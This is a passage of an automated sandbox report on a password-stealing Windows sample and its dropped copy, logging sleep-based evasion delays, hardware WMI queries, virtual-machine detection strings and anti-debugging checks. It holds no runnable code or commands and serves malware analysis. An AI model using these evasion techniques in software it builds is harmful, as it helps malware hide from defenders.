Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory allocated: 8D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory allocated: 71C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory allocated: 9E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory allocated: AE90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory allocated: 30D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory allocated: 3230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory allocated: 5230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Memory allocated: 1760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Memory allocated: 51E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Memory allocated: 8BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Memory allocated: 9BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Memory allocated: 8BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Memory allocated: 1330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Memory allocated: 29A0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5931	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5307	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Window / User API: threadDelayed 4403	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Window / User API: threadDelayed 4634	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Window / User API: threadDelayed 4938
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Window / User API: threadDelayed 931

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 2940	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7520	Thread sleep count: 4403 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -99745s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -99638s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7520	Thread sleep count: 4634 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -99531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -99418s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -99311s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -99093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -98874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -98765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -98642s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -98500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -98389s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -98281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -98171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -97952s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -97843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -97734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -97624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -97500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -97390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -97280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -97171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -97062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -96952s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -96843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -96734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -96624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -96499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -96324s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -96218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -96109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -96000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -95890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -95781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -95671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -95562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -95453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -95343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -95234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -95125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -95015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe TID: 7500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7512	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -99891s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7828	Thread sleep count: 4938 > 30
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7828	Thread sleep count: 931 > 30
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -99782s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -99657s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -99532s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -99313s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -99188s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -99047s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -98938s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -98828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -98702s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -98594s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -98469s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -98359s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -98250s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -98138s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -97998s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -97891s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -97782s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -97657s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -97532s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -97422s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -97313s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -97188s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -97063s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -96938s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -96813s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -96703s >= -30000s
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 99745	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 99638	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 99531	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 99418	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 99311	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 99093	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 98874	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 98765	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 98642	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 98500	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 98389	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 98281	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 98171	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 98062	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 97952	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 97843	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 97734	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 97624	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 97500	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 97390	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 97280	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 97171	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 97062	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 96952	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 96843	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 96734	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 96624	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 96499	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 96324	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 96218	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 96109	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 96000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 95890	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 95781	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 95671	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 95562	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 95453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 95343	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 95234	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 95125	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 95015	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 99891
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 99782
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 99657
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 99532
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 99422
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 99313
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 99188
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 99047
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 98938
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 98828
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 98702
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 98594
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 98469
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 98359
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 98250
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 98138
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 97998
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 97891
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 97782
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 97657
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 97532
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 97422
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 97313
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 97188
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 97063
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 96938
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 96813
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 96703
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Thread delayed: delay time: 922337203685477

Source: lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBox
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Code function: 9_2_030D70A8 CheckRemoteDebuggerPresent,

9_2_030D70A8

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process token adjusted: Debug	Jump to behavior
